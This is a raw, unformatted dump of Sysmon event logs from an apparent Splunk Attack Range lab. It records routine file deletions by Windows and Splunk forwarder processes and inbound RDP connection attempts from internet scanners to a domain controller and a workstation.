AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:42.328{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\DeviceMetadataCache\OLDCACHE.000MD5=C990B520F5CDA3FDE1DB518B910CF86D,SHA256=D026D1429D0D9A643113D781A5C2928ACBCE86A029F086AB85AAACB97AD2F520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:42.218{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=82C220B70C0F1E1EDD4D00C69550C88C,SHA256=417D3496C49E766105C13E7BFE0F79C7BB7F58EE3E86111E02E9B176299CFDF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:40.443{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-45142-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050058Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:42.466{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA34FDEDF5CE65D548DF6C4A1DC8855,SHA256=A8D9F1BD0513C92F9CBC2E9BC8154D3A0F93FB7A57C19DD76C747D067B6E8165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:43.953{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71FA0721D143FE0B9890BC08F2F09608,SHA256=E1DD835143F2C8C0693C6D0CC000E9CF44356E5E4386F67C04A0F59407A79C1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:43.797{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C5999CF0AA571048854673DBF8DDD50,SHA256=D94330540C398B7517E300AF759828FE19078765E1803B19D00EFA9E300BB915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:43.484{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:43.359{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A613DCBE4846E28E6076A1135FBCB232,SHA256=DB71FD9C3290BE2039464AF96CFFA72AB9C1993DDD4747AFF08A694E8B821DE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:43.359{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=46CF2113F63EA7436D6857EE46B3BA70,SHA256=59D43F0A170BF22A5C52429648262FD6381BB135BF74D6AA2236764A4D5A6F43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:43.328{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2385B1D33756AC61D0BE50798EDC61D7,SHA256=A568212AD9577EF917C3DA65AC9CC412707DD1DFF57E6187159498169EAC8498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:43.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050059Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:43.513{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=981FB0F341CA472748B5D6B7F895386B,SHA256=567ADB1F8263DC7C640A0258A5DE5C8AA22221BC4914AFD94F484B4B1C66D27E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:44.984{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=493E912EF2C3F417ACA5C9AA27739071,SHA256=03B3B022458F6F94362A87A37F961E9BA92C24B7FF36591A23EB649A040B3789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:44.422{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=315CCA51AB181EEAC4D1E3DDB6211769,SHA256=59529D65B54F3B3D702925FA6E2CC7D1CAF526E193F4C747954DFDC9D6ECF4F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050062Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:44.591{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF16C406AF6049667C40CD1B3A2E70C7,SHA256=A9416F7415D5DE9E1B9A6A581A97C64FC5FB9361FE1497B0A5161D2C2A2231C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050061Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:44.357{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4B145FFA55AAD29DDCE33B4303F77B8,SHA256=368BCC7C30C2F605B4AD548B87B5E5A085AE0F4EE0A89CB39BC23B5E8028B5DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050060Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:41.793{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50815-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:45.422{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=17C9A890D654F5CDC7C08EC622C86F3F,SHA256=949D607B61CF1B1D7C73D4E1528FCF90A66B165C1F1B04A745508E6FFE818F71,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:43.131{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57523-false10.0.1.12-8000- 354300x800000000000000073254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:42.994{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53636-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050065Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:45.919{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA9567D3F57A72F8FFC02CA12BF4B998,SHA256=8A2DB0D8F618CB0DB2DF7A732F616221AAB4BE994FCD564FB3E77645D2BD44AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050064Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:45.622{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B990BE919D97D23115FA3C366280E7A8,SHA256=0DDFBB8159B251C626225BC8BC525D5C33DBF07EABBF68ADBAB31713D7EBCC1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050063Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:42.380{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53197-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:46.765{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:46.656{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=879FD4944B47374A03BB68381BDE7741,SHA256=418E1B01BB939ED40E0F4F16A77CD8E8869E1990A9B51363553E21D5BC7500FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:46.453{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=5C763F260805EB99C651F94CEB2DCC56,SHA256=114AEA54FC898DDDE050D7E445BB694C3B7556F64FB129B2F5204C057C7E596A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:45.032{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-46506-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:44.925{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49235-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:46.000{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF9F3EFA3024DF0454A7A1404F2A903A,SHA256=83A638A730E4FDD3AFD618B863CAB6A6C20193160F37FC0ED0EB7FCDACD4346C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050068Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:46.644{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84788E6467D83F9D6819DDC7D4156E9A,SHA256=8B3061A3C4A04C0D5C641DF4473B12162706EB96621EF764FEBC3CD3D7B4D34B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050067Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:43.808{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52515-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050066Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:43.369{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52292-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:47.437{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=39509EBC703B37B780EA423B794D4C97,SHA256=DA9BBA6674905E8DCA73FE88A2388B39F994E80699F48CF1E62E95C70AD8BC3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:47.171{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:47.015{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21B64ECD0D99AF0F22333B20B46F944,SHA256=F957043FB1D29EDF6A871DC777F15630FC73BF1F737278D37978DFFB392BD6AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050071Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:45.166{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63460-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050070Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:47.676{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E720AAD6E8E008CAFE347A81BC3A7F,SHA256=1BFD1A9E9DF20F9D8844769742847F649ED16D79E481B342C55A9A6CC806C008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050069Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:47.316{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66F2ACF57274593B975AE719AA787C71,SHA256=72CA4869719F35A77E1F110A266B6BFB98BF12E6C7C9AAA709765A5EA218FA07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:48.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:46.495{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-47871-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:46.427{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50606-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:45.940{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com64616-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:48.515{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=5E0B0F9E9EBC4C381E594F3BF33172F3,SHA256=61B12AFA3DFCE7F75CE323DA153E57AC20E779452CD29A0E018F6DD51C52BED2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:48.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:48.140{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE07F8FDA652D4F97084D2CAF2D6A973,SHA256=7C901144E4D9F09AB48744FC2C350E96DB0BBCEBCB374904B9D4C2477FF45CB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:48.031{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA5AE0F87B175359FB8ABE969CFB731A,SHA256=175C5DE63FD84C346C01D3DC28917FDC99175DE49416AB2DE7D05B04EB4B32E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050073Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:46.542{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55250-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050072Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:48.691{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B510B9FA743BF67ED5AB08EBA17AF5D5,SHA256=8E7264FF6DEEFD73144C846DF1880FAA5C68731AA17BD95C79EC7E19FD8A11B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:47.909{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51970-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:47.321{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57717-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:49.531{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D3BB6C439262E5394D942CA552BF4705,SHA256=283234BEFB7DF50398860BBB24DC690CC6F30E54269E9D214F3A9EB2B065DCE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:49.328{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9FD63A9E61C920D20F325BA2F314FE8,SHA256=F6944E3A45761225A9F3CAA34529CCAA4A53D19178D64698A0B6A6B836ECCB0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:49.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:49.093{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFF29AE34DA7B83295D6712D7380185A,SHA256=70E6DA02898FC82A0886BE8B14AB4BBCF6CB44231BA3CAF7F1C613B1ABBEA5C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050075Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:49.738{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F6A6CF2F8ACBDB423722F88316A623A,SHA256=DDB59116E32D70EF52B95FC93D56A842B8FCB42269AC38B851D678B74563580F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050074Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:49.098{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=669F64C0CFB6BEC33B4DFCE33E96F67A,SHA256=E5E9AAD8F5843ABCFD8A5F183D916BBFE3160C2D467A59B4023A3C601FB9BF87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:50.718{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:49.130{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57524-false10.0.1.12-8000- 23542300x800000000000000073282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:50.578{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT 